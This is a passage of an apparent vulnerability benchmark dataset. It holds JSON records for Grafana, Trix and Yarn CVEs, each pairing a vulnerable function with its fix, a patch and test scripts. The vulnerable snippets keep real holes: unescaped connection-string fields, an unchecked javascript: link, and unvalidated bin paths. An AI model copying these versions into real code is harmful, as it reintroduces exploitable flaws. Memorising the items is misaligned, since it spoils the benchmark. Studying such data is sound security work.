Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/grafana/grafana", "patch_url": ["https://github.com/grafana/grafana/commit/19dbd27c5caa1a160bd5854b65a4e1fe2a8a4f00"], "programing_language": "Go", "vul_func": [{"id": "vul_go_30_1", "commit": "8cf75b4e75be0a3561c4ff1b1cfc884206b30745", "file_path": "pkg/tsdb/mysql/mysql.go", "start_line": 27, "end_line": 72, "snippet": "func newMysqlQueryEndpoint(datasource *models.DataSource) (tsdb.TsdbQueryEndpoint, error) {\n\tlogger := log.New(\"tsdb.mysql\")\n\n\tprotocol := \"tcp\"\n\tif strings.HasPrefix(datasource.Url, \"/\") {\n\t\tprotocol = \"unix\"\n\t}\n\tcnnstr := fmt.Sprintf(\"%s:%s@%s(%s)/%s?collation=utf8mb4_unicode_ci&parseTime=true&loc=UTC&allowNativePasswords=true\",\n\t\tdatasource.User,\n\t\tdatasource.DecryptedPassword(),\n\t\tprotocol,\n\t\tdatasource.Url,\n\t\tdatasource.Database,\n\t)\n\n\ttlsConfig, err := datasource.GetTLSConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif tlsConfig.RootCAs != nil || len(tlsConfig.Certificates) > 0 {\n\t\ttlsConfigString := fmt.Sprintf(\"ds%d\", datasource.Id)\n\t\tif err := mysql.RegisterTLSConfig(tlsConfigString, tlsConfig); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcnnstr += \"&tls=\" + tlsConfigString\n\t}\n\n\tif setting.Env == setting.DEV {\n\t\tlogger.Debug(\"getEngine\", \"connection\", cnnstr)\n\t}\n\n\tconfig := sqleng.SqlQueryEndpointConfiguration{\n\t\tDriverName: \"mysql\",\n\t\tConnectionString: cnnstr,\n\t\tDatasource: datasource,\n\t\tTimeColumnNames: []string{\"time\", \"time_sec\"},\n\t\tMetricColumnTypes: []string{\"CHAR\", \"VARCHAR\", \"TINYTEXT\", \"TEXT\", \"MEDIUMTEXT\", \"LONGTEXT\"},\n\t}\n\n\trowTransformer := mysqlQueryResultTransformer{\n\t\tlog: logger,\n\t}\n\n\treturn sqleng.NewSqlQueryEndpoint(&config, &rowTransformer, newMysqlMacroEngine(logger), logger)\n}"}], "fix_func": [{"id": "fix_go_30_1", "commit": "19dbd27c5caa1a160bd5854b65a4e1fe2a8a4f00", "file_path": "pkg/tsdb/mysql/mysql.go", "start_line": 31, "end_line": 77, "snippet": "func newMysqlQueryEndpoint(datasource *models.DataSource) (tsdb.TsdbQueryEndpoint, error) {\n\tlogger := log.New(\"tsdb.mysql\")\n\n\tprotocol := \"tcp\"\n\tif strings.HasPrefix(datasource.Url, \"/\") {\n\t\tprotocol = \"unix\"\n\t}\n\n\tcnnstr := fmt.Sprintf(\"%s:%s@%s(%s)/%s?collation=utf8mb4_unicode_ci&parseTime=true&loc=UTC&allowNativePasswords=true\",\n\t\tcharacterEscape(datasource.User, \":\"),\n\t\tcharacterEscape(datasource.DecryptedPassword(), \"@\"),\n\t\tprotocol,\n\t\tcharacterEscape(datasource.Url, \")\"),\n\t\tcharacterEscape(datasource.Database, \"?\"),\n\t)\n\n\ttlsConfig, err := datasource.GetTLSConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif tlsConfig.RootCAs != nil || len(tlsConfig.Certificates) > 0 {\n\t\ttlsConfigString := fmt.Sprintf(\"ds%d\", datasource.Id)\n\t\tif err := mysql.RegisterTLSConfig(tlsConfigString, tlsConfig); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcnnstr += \"&tls=\" + tlsConfigString\n\t}\n\n\tif setting.Env == setting.DEV {\n\t\tlogger.Debug(\"getEngine\", \"connection\", cnnstr)\n\t}\n\n\tconfig := sqleng.SqlQueryEndpointConfiguration{\n\t\tDriverName: \"mysql\",\n\t\tConnectionString: cnnstr,\n\t\tDatasource: datasource,\n\t\tTimeColumnNames: []string{\"time\", \"time_sec\"},\n\t\tMetricColumnTypes: []string{\"CHAR\", \"VARCHAR\", \"TINYTEXT\", \"TEXT\", \"MEDIUMTEXT\", 
\"LONGTEXT\"},\n\t}\n\n\trowTransformer := mysqlQueryResultTransformer{\n\t\tlog: logger,\n\t}\n\n\treturn sqleng.NewSqlQueryEndpoint(&config, &rowTransformer, newMysqlMacroEngine(logger), logger)\n}"}, {"id": "fix_go_30_2", "commit": "19dbd27c5caa1a160bd5854b65a4e1fe2a8a4f00", "file_path": "pkg/tsdb/mysql/mysql.go", "start_line": 27, "end_line": 30, "snippet": "func characterEscape(s string, escapeChar string) string {\n\treturn strings.Replace(s, escapeChar, url.QueryEscape(escapeChar), -1)\n}\n"}], "vul_patch": "--- a/pkg/tsdb/mysql/mysql.go\n+++ b/pkg/tsdb/mysql/mysql.go\n@@ -5,12 +5,13 @@\n \tif strings.HasPrefix(datasource.Url, \"/\") {\n \t\tprotocol = \"unix\"\n \t}\n+\n \tcnnstr := fmt.Sprintf(\"%s:%s@%s(%s)/%s?collation=utf8mb4_unicode_ci&parseTime=true&loc=UTC&allowNativePasswords=true\",\n-\t\tdatasource.User,\n-\t\tdatasource.DecryptedPassword(),\n+\t\tcharacterEscape(datasource.User, \":\"),\n+\t\tcharacterEscape(datasource.DecryptedPassword(), \"@\"),\n \t\tprotocol,\n-\t\tdatasource.Url,\n-\t\tdatasource.Database,\n+\t\tcharacterEscape(datasource.Url, \")\"),\n+\t\tcharacterEscape(datasource.Database, \"?\"),\n \t)\n \n \ttlsConfig, err := datasource.GetTLSConfig()\n\n--- /dev/null\n+++ b/pkg/tsdb/mysql/mysql.go\n@@ -0,0 +1,3 @@\n+func characterEscape(s string, escapeChar string) string {\n+\treturn strings.Replace(s, escapeChar, url.QueryEscape(escapeChar), -1)\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-19499:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/grafana\nrm -rf ./pkg/tsdb/mysql/mysql_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestNewMysqlQueryEndpoint_Escape$ github.com/grafana/grafana/pkg/tsdb/mysql\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2019-19499:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/grafana\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run ^TestMySQL$ github.com/grafana/grafana/pkg/tsdb/mysql 2>/dev/null"} {"cve_id": "CVE-2025-21610", "cve_description": "Trix is a what-you-see-is-what-you-get rich text editor for everyday writing. Versions prior to 2.1.12 are vulnerable to cross-site scripting when pasting malicious code in the link field. An attacker could trick the user to copy&paste a malicious `javascript:` URL as a link that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed. Users should upgrade to Trix editor version 2.1.12 or later to receive a patch. In addition to upgrading, affected users can disallow browsers that don't support a Content Security Policy (CSP) as a workaround for this and other cross-site scripting vulnerabilities. 
Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using script-src-elem.", "cwe_info": {"CWE-79": {"name": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "description": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users."}}, "repo": "https://github.com/basecamp/trix", "patch_url": ["https://github.com/basecamp/trix/commit/180c8d337f18e1569cea6ef29b4d03ffff5b5faa"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_299_1", "commit": "f4d64c24c82cc4b4810b00dda131bfc2267a79cf", "file_path": "src/trix/controllers/toolbar_controller.js", "start_line": 205, "end_line": 216, "snippet": " setAttribute(dialogElement) {\n const attributeName = getAttributeName(dialogElement)\n const input = getInputForDialog(dialogElement, attributeName)\n if (input.willValidate && !input.checkValidity()) {\n input.setAttribute(\"data-trix-validate\", \"\")\n input.classList.add(\"trix-validate\")\n return input.focus()\n } else {\n this.delegate?.toolbarDidUpdateAttribute(attributeName, input.value)\n return this.hideDialog()\n }\n }"}], "fix_func": [{"id": "fix_js_299_1", "commit": "180c8d337f18e1569cea6ef29b4d03ffff5b5faa", "file_path": "src/trix/controllers/toolbar_controller.js", "start_line": 207, "end_line": 221, "snippet": " setAttribute(dialogElement) {\n const attributeName = getAttributeName(dialogElement)\n const input = getInputForDialog(dialogElement, attributeName)\n\n input.willValidate && input.setCustomValidity(\"\")\n if (input.willValidate && !input.checkValidity() || !this.safeAttribute(input)) {\n input.setCustomValidity(\"Invalid value\")\n input.setAttribute(\"data-trix-validate\", \"\")\n input.classList.add(\"trix-validate\")\n return input.focus()\n } else {\n this.delegate?.toolbarDidUpdateAttribute(attributeName, input.value)\n return this.hideDialog()\n }\n }"}, {"id": "fix_js_299_2", "commit": "180c8d337f18e1569cea6ef29b4d03ffff5b5faa", "file_path": "src/trix/controllers/toolbar_controller.js", "start_line": 223, "end_line": 230, "snippet": " safeAttribute(input) {\n if (input.hasAttribute(\"data-trix-validate-href\")) {\n return DOMPurify.isValidAttribute(\"a\", \"href\", input.value)\n } else {\n return true\n }\n }\n"}], "vul_patch": "--- a/src/trix/controllers/toolbar_controller.js\n+++ b/src/trix/controllers/toolbar_controller.js\n@@ -1,7 +1,10 @@\n setAttribute(dialogElement) {\n const attributeName = getAttributeName(dialogElement)\n const input = getInputForDialog(dialogElement, attributeName)\n- if (input.willValidate && !input.checkValidity()) {\n+\n+ input.willValidate && input.setCustomValidity(\"\")\n+ if (input.willValidate && !input.checkValidity() || !this.safeAttribute(input)) {\n+ input.setCustomValidity(\"Invalid value\")\n input.setAttribute(\"data-trix-validate\", \"\")\n input.classList.add(\"trix-validate\")\n return input.focus()\n\n--- /dev/null\n+++ b/src/trix/controllers/toolbar_controller.js\n@@ -0,0 +1,7 @@\n+ safeAttribute(input) {\n+ if (input.hasAttribute(\"data-trix-validate-href\")) {\n+ return DOMPurify.isValidAttribute(\"a\", \"href\", input.value)\n+ } else {\n+ return true\n+ }\n+ }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10773", "cve_description": "In Yarn before 1.21.1, the package install functionality can be abused to generate arbitrary symlinks 
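The Trix record above delegates link validation to DOMPurify.isValidAttribute. Reduced to its essence, the safe check is a scheme allowlist rather than a "javascript:" blocklist; here is a hedged Python sketch of that idea (the scheme set is illustrative, not DOMPurify's exact policy).

from urllib.parse import urlparse

SAFE_SCHEMES = {"", "http", "https", "mailto", "tel"}  # "" covers relative URLs

def safe_href(value):
    # Drop whitespace/control characters first: browsers ignore them, so a
    # payload like 'jav\tascript:alert(1)' must not slip past the check.
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace())
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES

assert safe_href("https://example.com/docs")
assert not safe_href("javascript:alert(1)")
assert not safe_href("jav\tascript:alert(1)")
print("href checks passed")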
on the host filesystem by using specially crafted \"bin\" keys. Existing files could be overwritten depending on the current user permission set.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/yarnpkg/yarn", "patch_url": ["https://github.com/yarnpkg/yarn/commit/039bafd74b7b1a88a53a54f8fa6fa872615e90e7"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_154_1", "commit": "ac04da8", "file_path": "src/util/normalize-manifest/fix.js", "start_line": 26, "end_line": 333, "snippet": "export default (async function(\n info: Dict,\n moduleLoc: string,\n reporter: Reporter,\n warn: WarnFunction,\n looseSemver: boolean,\n): Promise {\n const files = await fs.readdir(moduleLoc);\n\n // clean info.version\n if (typeof info.version === 'string') {\n info.version = semver.clean(info.version, looseSemver) || info.version;\n }\n\n // if name or version aren't set then set them to empty strings\n info.name = info.name || '';\n info.version = info.version || '';\n\n // if the man field is a string then coerce it to an array\n if (typeof info.man === 'string') {\n info.man = [info.man];\n }\n\n // if the keywords field is a string then split it on any whitespace\n if (typeof info.keywords === 'string') {\n info.keywords = info.keywords.split(/\\s+/g);\n }\n\n // if there's no contributors field but an authors field then expand it\n if (!info.contributors && files.indexOf('AUTHORS') >= 0) {\n const authorsFilepath = path.join(moduleLoc, 'AUTHORS');\n const authorsFilestats = await fs.stat(authorsFilepath);\n if (authorsFilestats.isFile()) {\n let authors = await fs.readFile(authorsFilepath);\n authors = authors\n .split(/\\r?\\n/g) // split on lines\n .map((line): string => line.replace(/^\\s*#.*$/, '').trim()) // remove comments\n .filter((line): boolean => !!line); // remove empty lines\n info.contributors = authors;\n }\n }\n\n // expand people fields to objects\n if (typeof info.author === 'string' || typeof info.author === 'object') {\n info.author = normalizePerson(info.author);\n }\n if (Array.isArray(info.contributors)) {\n info.contributors = info.contributors.map(normalizePerson);\n }\n if (Array.isArray(info.maintainers)) {\n info.maintainers = info.maintainers.map(normalizePerson);\n }\n\n // if there's no readme field then load the README file from the cwd\n if (!info.readme) {\n const readmeCandidates = files\n .filter((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'readme' || lower.indexOf('readme.') === 0;\n })\n .sort((filename1, filename2): number => {\n // favor files with extensions\n return filename2.indexOf('.') - filename1.indexOf('.');\n });\n\n for (const readmeFilename of readmeCandidates) {\n const readmeFilepath = path.join(moduleLoc, readmeFilename);\n const readmeFileStats = await fs.stat(readmeFilepath);\n if (readmeFileStats.isFile()) {\n info.readmeFilename = readmeFilename;\n info.readme = await fs.readFile(readmeFilepath);\n break;\n }\n }\n }\n\n // if there's no description then take the first paragraph from the readme\n if (!info.description && info.readme) {\n const desc = extractDescription(info.readme);\n if (desc) {\n info.description = desc;\n }\n }\n\n // support array of engine keys\n if (Array.isArray(info.engines)) {\n const 
engines = {};\n for (const str of info.engines) {\n if (typeof str === 'string') {\n const [name, ...patternParts] = str.trim().split(/ +/g);\n engines[name] = patternParts.join(' ');\n }\n }\n info.engines = engines;\n }\n\n // if the repository field is a string then assume it's a git repo and expand it\n if (typeof info.repository === 'string') {\n info.repository = {\n type: 'git',\n url: info.repository,\n };\n }\n\n const repo = info.repository;\n\n // explode info.repository.url if it's a hosted git shorthand\n if (repo && typeof repo === 'object' && typeof repo.url === 'string') {\n repo.url = hostedGitFragmentToGitUrl(repo.url, reporter);\n }\n\n // allow bugs to be specified as a string, expand it to an object with a single url prop\n if (typeof info.bugs === 'string') {\n info.bugs = {url: info.bugs};\n }\n\n // normalize homepage url to http\n if (typeof info.homepage === 'string') {\n const parts = url.parse(info.homepage);\n parts.protocol = parts.protocol || 'http:';\n if (parts.pathname && !parts.hostname) {\n parts.hostname = parts.pathname;\n parts.pathname = '';\n }\n info.homepage = url.format(parts);\n }\n\n // if the `bin` field is as string then expand it to an object with a single property\n // based on the original `bin` field and `name field`\n // { name: \"foo\", bin: \"cli.js\" } -> { name: \"foo\", bin: { foo: \"cli.js\" } }\n if (typeof info.name === 'string' && typeof info.bin === 'string' && info.bin.length > 0) {\n // Remove scoped package name for consistency with NPM's bin field fixing behaviour\n const name = info.name.replace(/^@[^\\/]+\\//, '');\n info.bin = {[name]: info.bin};\n }\n\n // bundleDependencies is an alias for bundledDependencies\n if (info.bundledDependencies) {\n info.bundleDependencies = info.bundledDependencies;\n delete info.bundledDependencies;\n }\n\n let scripts: Object;\n\n // dummy script object to shove file inferred scripts onto\n if (info.scripts && typeof info.scripts === 'object') {\n scripts = info.scripts;\n } else {\n scripts = {};\n }\n\n // if there's a server.js file and no start script then set it to `node server.js`\n if (!scripts.start && files.indexOf('server.js') >= 0) {\n scripts.start = 'node server.js';\n }\n\n // if there's a binding.gyp file and no install script then set it to `node-gyp rebuild`\n if (!scripts.install && files.indexOf('binding.gyp') >= 0) {\n scripts.install = 'node-gyp rebuild';\n }\n\n // set scripts if we've polluted the empty object\n if (Object.keys(scripts).length) {\n info.scripts = scripts;\n }\n\n const dirs = info.directories;\n\n if (dirs && typeof dirs === 'object') {\n const binDir = dirs.bin;\n\n if (!info.bin && binDir && typeof binDir === 'string') {\n const bin = (info.bin = {});\n const fullBinDir = path.join(moduleLoc, binDir);\n\n if (await fs.exists(fullBinDir)) {\n for (const scriptName of await fs.readdir(fullBinDir)) {\n if (scriptName[0] === '.') {\n continue;\n }\n bin[scriptName] = path.join('.', binDir, scriptName);\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', binDir, info.name));\n }\n }\n\n const manDir = dirs.man;\n\n if (!info.man && typeof manDir === 'string') {\n const man = (info.man = []);\n const fullManDir = path.join(moduleLoc, manDir);\n\n if (await fs.exists(fullManDir)) {\n for (const filename of await fs.readdir(fullManDir)) {\n if (/^(.*?)\\.[0-9]$/.test(filename)) {\n man.push(path.join('.', manDir, filename));\n }\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', manDir, info.name));\n }\n }\n }\n\n delete 
info.directories;\n\n // normalize licenses field\n const licenses = info.licenses;\n if (Array.isArray(licenses) && !info.license) {\n let licenseTypes = [];\n\n for (let license of licenses) {\n if (license && typeof license === 'object') {\n license = license.type;\n }\n if (typeof license === 'string') {\n licenseTypes.push(license);\n }\n }\n\n licenseTypes = licenseTypes.filter(isValidLicense);\n\n if (licenseTypes.length === 1) {\n info.license = licenseTypes[0];\n } else if (licenseTypes.length) {\n info.license = `(${licenseTypes.join(' OR ')})`;\n }\n }\n\n const license = info.license;\n\n // normalize license\n if (license && typeof license === 'object') {\n info.license = license.type;\n }\n\n // get license file\n const licenseFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return (\n lower === 'license' || lower.startsWith('license.') || lower === 'unlicense' || lower.startsWith('unlicense.')\n );\n });\n if (licenseFile) {\n const licenseFilepath = path.join(moduleLoc, licenseFile);\n const licenseFileStats = await fs.stat(licenseFilepath);\n if (licenseFileStats.isFile()) {\n const licenseContent = await fs.readFile(licenseFilepath);\n const inferredLicense = inferLicense(licenseContent);\n info.licenseText = licenseContent;\n\n const license = info.license;\n\n if (typeof license === 'string') {\n if (inferredLicense && isValidLicense(inferredLicense) && !isValidLicense(license)) {\n // some packages don't specify their license version but we can infer it based on their license file\n const basicLicense = license.toLowerCase().replace(/(-like|\\*)$/g, '');\n const expandedLicense = inferredLicense.toLowerCase();\n if (expandedLicense.startsWith(basicLicense)) {\n // TODO consider doing something to notify the user\n info.license = inferredLicense;\n }\n }\n } else if (inferredLicense) {\n // if there's no license then infer it based on the license file\n info.license = inferredLicense;\n } else {\n // valid expression to refer to a license in a file\n info.license = `SEE LICENSE IN ${licenseFile}`;\n }\n }\n }\n\n if (typeof info.license === 'string') {\n // sometimes licenses are known by different names, reduce them\n info.license = LICENSE_RENAMES[info.license] || info.license;\n } else if (typeof info.readme === 'string') {\n // the license might be at the bottom of the README\n const inferredLicense = inferLicense(info.readme);\n if (inferredLicense) {\n info.license = inferredLicense;\n }\n }\n\n // get notice file\n const noticeFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'notice' || lower.startsWith('notice.');\n });\n if (noticeFile) {\n const noticeFilepath = path.join(moduleLoc, noticeFile);\n const noticeFileStats = await fs.stat(noticeFilepath);\n if (noticeFileStats.isFile()) {\n info.noticeText = await fs.readFile(noticeFilepath);\n }\n }\n\n for (const dependencyType of MANIFEST_FIELDS) {\n const dependencyList = info[dependencyType];\n if (dependencyList && typeof dependencyList === 'object') {\n delete dependencyList['//'];\n for (const name in dependencyList) {\n dependencyList[name] = dependencyList[name] || '';\n }\n }\n }\n});"}], "fix_func": [{"id": "fix_js_154_1", "commit": "039bafd", "file_path": "src/util/normalize-manifest/fix.js", "start_line": 28, "end_line": 353, "snippet": "export default (async function(\n info: Dict,\n moduleLoc: string,\n reporter: Reporter,\n warn: WarnFunction,\n looseSemver: boolean,\n): Promise {\n const files = await 
fs.readdir(moduleLoc);\n\n // clean info.version\n if (typeof info.version === 'string') {\n info.version = semver.clean(info.version, looseSemver) || info.version;\n }\n\n // if name or version aren't set then set them to empty strings\n info.name = info.name || '';\n info.version = info.version || '';\n\n // if the man field is a string then coerce it to an array\n if (typeof info.man === 'string') {\n info.man = [info.man];\n }\n\n // if the keywords field is a string then split it on any whitespace\n if (typeof info.keywords === 'string') {\n info.keywords = info.keywords.split(/\\s+/g);\n }\n\n // if there's no contributors field but an authors field then expand it\n if (!info.contributors && files.indexOf('AUTHORS') >= 0) {\n const authorsFilepath = path.join(moduleLoc, 'AUTHORS');\n const authorsFilestats = await fs.stat(authorsFilepath);\n if (authorsFilestats.isFile()) {\n let authors = await fs.readFile(authorsFilepath);\n authors = authors\n .split(/\\r?\\n/g) // split on lines\n .map((line): string => line.replace(/^\\s*#.*$/, '').trim()) // remove comments\n .filter((line): boolean => !!line); // remove empty lines\n info.contributors = authors;\n }\n }\n\n // expand people fields to objects\n if (typeof info.author === 'string' || typeof info.author === 'object') {\n info.author = normalizePerson(info.author);\n }\n if (Array.isArray(info.contributors)) {\n info.contributors = info.contributors.map(normalizePerson);\n }\n if (Array.isArray(info.maintainers)) {\n info.maintainers = info.maintainers.map(normalizePerson);\n }\n\n // if there's no readme field then load the README file from the cwd\n if (!info.readme) {\n const readmeCandidates = files\n .filter((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'readme' || lower.indexOf('readme.') === 0;\n })\n .sort((filename1, filename2): number => {\n // favor files with extensions\n return filename2.indexOf('.') - filename1.indexOf('.');\n });\n\n for (const readmeFilename of readmeCandidates) {\n const readmeFilepath = path.join(moduleLoc, readmeFilename);\n const readmeFileStats = await fs.stat(readmeFilepath);\n if (readmeFileStats.isFile()) {\n info.readmeFilename = readmeFilename;\n info.readme = await fs.readFile(readmeFilepath);\n break;\n }\n }\n }\n\n // if there's no description then take the first paragraph from the readme\n if (!info.description && info.readme) {\n const desc = extractDescription(info.readme);\n if (desc) {\n info.description = desc;\n }\n }\n\n // support array of engine keys\n if (Array.isArray(info.engines)) {\n const engines = {};\n for (const str of info.engines) {\n if (typeof str === 'string') {\n const [name, ...patternParts] = str.trim().split(/ +/g);\n engines[name] = patternParts.join(' ');\n }\n }\n info.engines = engines;\n }\n\n // if the repository field is a string then assume it's a git repo and expand it\n if (typeof info.repository === 'string') {\n info.repository = {\n type: 'git',\n url: info.repository,\n };\n }\n\n const repo = info.repository;\n\n // explode info.repository.url if it's a hosted git shorthand\n if (repo && typeof repo === 'object' && typeof repo.url === 'string') {\n repo.url = hostedGitFragmentToGitUrl(repo.url, reporter);\n }\n\n // allow bugs to be specified as a string, expand it to an object with a single url prop\n if (typeof info.bugs === 'string') {\n info.bugs = {url: info.bugs};\n }\n\n // normalize homepage url to http\n if (typeof info.homepage === 'string') {\n const parts = url.parse(info.homepage);\n 
parts.protocol = parts.protocol || 'http:';\n if (parts.pathname && !parts.hostname) {\n parts.hostname = parts.pathname;\n parts.pathname = '';\n }\n info.homepage = url.format(parts);\n }\n\n // if the `bin` field is as string then expand it to an object with a single property\n // based on the original `bin` field and `name field`\n // { name: \"foo\", bin: \"cli.js\" } -> { name: \"foo\", bin: { foo: \"cli.js\" } }\n if (typeof info.name === 'string' && typeof info.bin === 'string' && info.bin.length > 0) {\n // Remove scoped package name for consistency with NPM's bin field fixing behaviour\n const name = info.name.replace(/^@[^\\/]+\\//, '');\n info.bin = {[name]: info.bin};\n }\n\n // Validate that the bin entries reference only files within their package, and that\n // their name is a valid file name\n if (typeof info.bin === 'object' && info.bin !== null) {\n const bin: Object = info.bin;\n for (const key of Object.keys(bin)) {\n const target = bin[key];\n if (!VALID_BIN_KEYS.test(key) || !isValidBin(target)) {\n delete bin[key];\n warn(reporter.lang('invalidBinEntry', info.name, key));\n } else {\n bin[key] = path.normalize(target);\n }\n }\n } else if (typeof info.bin !== 'undefined') {\n delete info.bin;\n warn(reporter.lang('invalidBinField', info.name));\n }\n\n // bundleDependencies is an alias for bundledDependencies\n if (info.bundledDependencies) {\n info.bundleDependencies = info.bundledDependencies;\n delete info.bundledDependencies;\n }\n\n let scripts: Object;\n\n // dummy script object to shove file inferred scripts onto\n if (info.scripts && typeof info.scripts === 'object') {\n scripts = info.scripts;\n } else {\n scripts = {};\n }\n\n // if there's a server.js file and no start script then set it to `node server.js`\n if (!scripts.start && files.indexOf('server.js') >= 0) {\n scripts.start = 'node server.js';\n }\n\n // if there's a binding.gyp file and no install script then set it to `node-gyp rebuild`\n if (!scripts.install && files.indexOf('binding.gyp') >= 0) {\n scripts.install = 'node-gyp rebuild';\n }\n\n // set scripts if we've polluted the empty object\n if (Object.keys(scripts).length) {\n info.scripts = scripts;\n }\n\n const dirs = info.directories;\n\n if (dirs && typeof dirs === 'object') {\n const binDir = dirs.bin;\n\n if (!info.bin && binDir && typeof binDir === 'string') {\n const bin = (info.bin = {});\n const fullBinDir = path.join(moduleLoc, binDir);\n\n if (await fs.exists(fullBinDir)) {\n for (const scriptName of await fs.readdir(fullBinDir)) {\n if (scriptName[0] === '.') {\n continue;\n }\n bin[scriptName] = path.join('.', binDir, scriptName);\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', binDir, info.name));\n }\n }\n\n const manDir = dirs.man;\n\n if (!info.man && typeof manDir === 'string') {\n const man = (info.man = []);\n const fullManDir = path.join(moduleLoc, manDir);\n\n if (await fs.exists(fullManDir)) {\n for (const filename of await fs.readdir(fullManDir)) {\n if (/^(.*?)\\.[0-9]$/.test(filename)) {\n man.push(path.join('.', manDir, filename));\n }\n }\n } else {\n warn(reporter.lang('manifestDirectoryNotFound', manDir, info.name));\n }\n }\n }\n\n delete info.directories;\n\n // normalize licenses field\n const licenses = info.licenses;\n if (Array.isArray(licenses) && !info.license) {\n let licenseTypes = [];\n\n for (let license of licenses) {\n if (license && typeof license === 'object') {\n license = license.type;\n }\n if (typeof license === 'string') {\n licenseTypes.push(license);\n }\n }\n\n 
licenseTypes = licenseTypes.filter(isValidLicense);\n\n if (licenseTypes.length === 1) {\n info.license = licenseTypes[0];\n } else if (licenseTypes.length) {\n info.license = `(${licenseTypes.join(' OR ')})`;\n }\n }\n\n const license = info.license;\n\n // normalize license\n if (license && typeof license === 'object') {\n info.license = license.type;\n }\n\n // get license file\n const licenseFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return (\n lower === 'license' || lower.startsWith('license.') || lower === 'unlicense' || lower.startsWith('unlicense.')\n );\n });\n if (licenseFile) {\n const licenseFilepath = path.join(moduleLoc, licenseFile);\n const licenseFileStats = await fs.stat(licenseFilepath);\n if (licenseFileStats.isFile()) {\n const licenseContent = await fs.readFile(licenseFilepath);\n const inferredLicense = inferLicense(licenseContent);\n info.licenseText = licenseContent;\n\n const license = info.license;\n\n if (typeof license === 'string') {\n if (inferredLicense && isValidLicense(inferredLicense) && !isValidLicense(license)) {\n // some packages don't specify their license version but we can infer it based on their license file\n const basicLicense = license.toLowerCase().replace(/(-like|\\*)$/g, '');\n const expandedLicense = inferredLicense.toLowerCase();\n if (expandedLicense.startsWith(basicLicense)) {\n // TODO consider doing something to notify the user\n info.license = inferredLicense;\n }\n }\n } else if (inferredLicense) {\n // if there's no license then infer it based on the license file\n info.license = inferredLicense;\n } else {\n // valid expression to refer to a license in a file\n info.license = `SEE LICENSE IN ${licenseFile}`;\n }\n }\n }\n\n if (typeof info.license === 'string') {\n // sometimes licenses are known by different names, reduce them\n info.license = LICENSE_RENAMES[info.license] || info.license;\n } else if (typeof info.readme === 'string') {\n // the license might be at the bottom of the README\n const inferredLicense = inferLicense(info.readme);\n if (inferredLicense) {\n info.license = inferredLicense;\n }\n }\n\n // get notice file\n const noticeFile = files.find((filename): boolean => {\n const lower = filename.toLowerCase();\n return lower === 'notice' || lower.startsWith('notice.');\n });\n if (noticeFile) {\n const noticeFilepath = path.join(moduleLoc, noticeFile);\n const noticeFileStats = await fs.stat(noticeFilepath);\n if (noticeFileStats.isFile()) {\n info.noticeText = await fs.readFile(noticeFilepath);\n }\n }\n\n for (const dependencyType of MANIFEST_FIELDS) {\n const dependencyList = info[dependencyType];\n if (dependencyList && typeof dependencyList === 'object') {\n delete dependencyList['//'];\n for (const name in dependencyList) {\n dependencyList[name] = dependencyList[name] || '';\n }\n }\n }\n});"}, {"id": "fix_js_154_2", "commit": "039bafd", "file_path": "src/util/normalize-manifest/fix.js", "start_line": 15, "end_line": 15, "snippet": "const VALID_BIN_KEYS = /^[a-z0-9_-]+$/i;"}, {"id": "fix_js_154_3", "commit": "039bafd", "file_path": "src/util/normalize-manifest/util.js", "start_line": 8, "end_line": 8, "snippet": "const PARENT_PATH = /^\\.\\.([\\\\\\/]|$)/;"}, {"id": "fix_js_154_4", "commit": "039bafd", "file_path": "src/util/normalize-manifest/util.js", "start_line": 14, "end_line": 16, "snippet": "export function isValidBin(bin: string): boolean {\n return !path.isAbsolute(bin) && !PARENT_PATH.test(path.normalize(bin));\n}"}], "vul_patch": "--- 
